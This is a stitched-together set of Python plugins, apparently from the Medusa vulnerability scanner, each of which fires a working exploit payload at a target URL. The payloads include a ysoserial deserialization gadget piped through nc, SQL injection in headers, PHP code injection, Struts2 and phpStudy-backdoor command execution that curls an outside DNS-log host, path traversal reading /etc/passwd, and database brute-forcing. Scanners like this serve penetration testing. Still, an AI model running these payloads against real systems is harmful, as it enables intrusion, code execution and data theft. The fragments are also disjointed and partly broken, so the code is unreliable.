def medusa(Url,RandomAgent,UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns=Dnslog() os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(Ysoserial().result(),dns.dns_host(),url, port)) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(url,scheme + "://" + url +":"+ str(port)) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/5clib/property.action" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('DEFAULT_PDF_LIB_PATH') != -1 and con.find( 'DEFAULT_SQL_BACKUP_PATH') != -1: Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def Main(Url, FileName, Values, ProxyIp): WriteFile = ClassCongregation.WriteFile( FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的) ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头 RandomAgent = ua.UserAgent() #获取生成的头文件 Medusa = [ B2BbuilderBackgroundCommandExecutionVulnerability.medusa( Url, RandomAgent, ProxyIp), B2BbuilderContainsVulnerabilitiesLocally.medusa( Url, RandomAgent, ProxyIp), B2BbuilderHeadSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability2.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability3.medusa(Url, RandomAgent, ProxyIp), B2BbuilderSQLInjectionVulnerability4.medusa(Url, RandomAgent, ProxyIp), ] try: for i in tqdm(Medusa, ascii=True, desc="B2Bbuilder plugin progress"): WriteFile.Write(str(i)) except: pass
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = url + payload resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', "Referer": payload_url, "Cookie": "JSESSIONID=abcT_7z-8zGPy7QoU_n1w; testBanCookie=test", "Content-Type": "application/x-www-form-urlencoded", 'User-Agent': RandomAgent, } resp = requests.post(payload_url, data=post_data, headers=headers, timeout=10, verify=False) con = resp.content code = resp.status_code if code == 200 and (con.lower().find('system:') != -1 or con.lower().find('root:') != -1): Medusa = "{} 存在泛微OA远程代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format( url, payload_url, post_data) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def BoomDB(Url, SqlUser, SqlPasswrod, InputFileName): if SqlUser != None or SqlPasswrod != None: BlastingDB = ClassCongregation.BlastingDB( SqlUser, SqlPasswrod) #只要其中账号文件或者密码文件不为空的话就开启爆破数据库功能 if InputFileName == None: #如果不是批量扫描使用就使用单独的UTL BlastingDB.BoomDB(Url) elif InputFileName != None: #如果是批量扫描就循环传入参数扫描 with open(InputFileName, encoding='utf-8') as f: for UrlLine in f: Urls = UrlLine BlastingDB.BoomDB(Urls) else: pass
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload host = url + ':' + str(port) Headers['Host'] = host Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' Headers['Connection'] = 'close' try: resp = requests.get(PayloadUrl, headers=Headers, proxies=proxies, timeout=5) con = resp.text code = resp.status_code if code == 200 and con.lower().find('bin') != -1 and con.lower().find( 'root') != -1: Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, PayloadUrl) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: for payload in payloads: payload_url = scheme+"://"+url+ ':' + str(port)+payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp!=None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp==None: resp = requests.post(payload_url, data=post_data,headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('a8 management monitor')!=-1 and con.lower().find('connections stack trace')!=-1: Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/admin/module_translations.php?mod=;phpinfo()' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("PHP Version") != -1 and con.find( "system") != -1: Medusa = "{}存在B2Bbuilder后台命令执行漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for turl in urls: try: payload_url = scheme + "://" + url + ':' + str( port) + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('active internet connections') != -1: Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cdef.php?action=actions" data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 " payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload host = url + ':' + str(port) headers = { 'Host': host, 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', } try: s = requests.session() resp = s.get(PayloadUrl, headers=headers, timeout=5) con = resp.text code = resp.status_code if code == 200 and con.lower().find('bin') != -1 and con.lower().find( 'root') != -1: Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, PayloadUrl) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for turl in urls: try: payload_url = scheme + "://" + url + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 500 and con.lower().find('gqxmicrosoft') != -1: Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类 try: payload_url = scheme + "://" + url + ':' + str( port) + "/include/get_user.aspx" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text if con.lower().find('button_normal') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit''' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cscan-hyhmnn') != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp=None): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"] for payload in payloads: payload_url = scheme + '://' + url + ':' + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("encrypt password") != -1: Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) #print(Medusa) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload_url = scheme+"://"+url+':'+str(port)+'/user.action' host=url+':'+str(port) headers = { 'Host':host, 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '571', 'DNT': '1', 'Referer':payload_url, 'Upgrade-Insecure-Requests': '1' } try: s = requests.session() resp = s.post(payload_url, data=payload,headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1: Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 Medusas = [] try: for payload in payloads: payload_url = scheme + "://" + url + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('81dc9bdb52d04dc20036dbd8313ed055') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) Medusas.append(str(Medusa)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) _t = VulnerabilityInfo(Medusas) return (_t.info)
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: if str(port) not in list: list.append(str(port)) #如果列表中不存在用户输入的端口,就把该端口发送到list里面下面好利用扫描 global resp headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } for payload in list: PayloadUrl = url + ':' + payload + '/.git/config' try: s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = s.get(PayloadUrl, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and con.lower().find( 'repositoryformatversion') != -1: Medusa = "{} \r\n漏洞详情:{}\r\n".format(url, PayloadUrl) ReturnList.append(Medusa) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) _t = VulnerabilityInfo(ReturnList) return (_t.info)
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 Random = str(random.randint(666, 666666)) commandS = ('''system("curl http://{}_phpStudy_backdoor_{}.7ktb2x.ceye.io");''').format(url, Random) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = scheme+"://"+url+payload headers = { 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '******', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': cmd, 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'User-Agent': RandomAgent } s = requests.session() if ProxyIp!=None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp==None: resp = s.get(payload_url,headers=headers, timeout=5, verify=False) time.sleep(5) ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter=' try: ceye_content = requests.get(ceyeurl, timeout=5).content if "{}_phpStudy_backdoor_{}".format(url, Random) in ceye_content: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\nHeader\r\n{}".format(url, payload_url,headers) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) except Exception as e: pass
def OpenProxy(): global RepeatCleaningAgent RepeatCleaningAgent = 1 #检查是否是刚爬取的并清洗的IP ProxyIpComparison = "" try: #尝试打开文件查看是否有代理池 with open("/ScanResult/ProxyPool.txt", encoding='utf-8') as f: try: FileCreationYime = time.localtime( os.path.getctime("/ScanResult/ProxyPool.txt")) # 获取文件创建时间 CurrentTime = time.localtime(time.time()) # 获取当前时间 if FileCreationYime.tm_year == CurrentTime.tm_year: # 判断年份是否相同 if CurrentTime.tm_mon == FileCreationYime.tm_mon: # 判断月份是否相同 a = FileCreationYime.tm_mday b = CurrentTime.tm_mday c = abs(a - b) # 计算绝对值 if c >= 3: # 如果大于3天删除 f.close() #关闭打开的文件后删除文件 os.remove("/ScanResult/ProxyPool.txt") else: f.close() os.remove("/ScanResult/ProxyPool.txt") else: f.close() os.remove("/ScanResult/ProxyPool.txt") except: pass for ProxyPool in f: #读取代理IP进行测试是否可以使用 ProxyIps = ProxyPool[:-1] #删除换行符号\n if ProxyIps == ProxyIpComparison: #对当前IP和上个IP进行对比如果相同代表爬取的IP全部不能用就直接跳出不在使用代理 return ProxyIpComparison = ProxyPool[:-1] proxies = { #"http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIps) } try: if requests.get('https://www.baidu.com/', proxies=proxies, timeout=2).status_code == 200: return ProxyIps #二次清洗完成的代理IP能用就返回 except: pass except: if RepeatCleaningAgent == 1: HttpProxy = ClassCongregation.Proxy() HttpProxy.HttpIpProxy() #如果不存在该文件就调用爬取类 OpenProxy() #接着调用自身 else: pass RepeatCleaningAgent = 0 #定义全局变量防止出问题
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload host = url + ':' + str(port) headers = { 'Host': host, 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', } s = requests.session() try: if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=5, allow_redirects=False) elif ProxyIp == None: resp = s.get(PayloadUrl, headers=headers, timeout=5, allow_redirects=False) con = resp.headers['\rSet-Cookie'] code = resp.status_code if code == 302 and con.lower().find('a=1') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "../../../../../../../../etc/passwd{{" payload_url = scheme + "://" + url + ":" + str(port) + "/robots" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': payload, 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('root:') != -1 and con.find( 'bin:') != -1 and con.find('sys:') != -1 and con.find( 'sync:') != -1: Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con.encode(encoding='utf-8')) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/5clib/Inuseraction.action?actionkind=reg" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('isIdCards()') != -1 and con.find( 'addressprompt') != -1: Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) 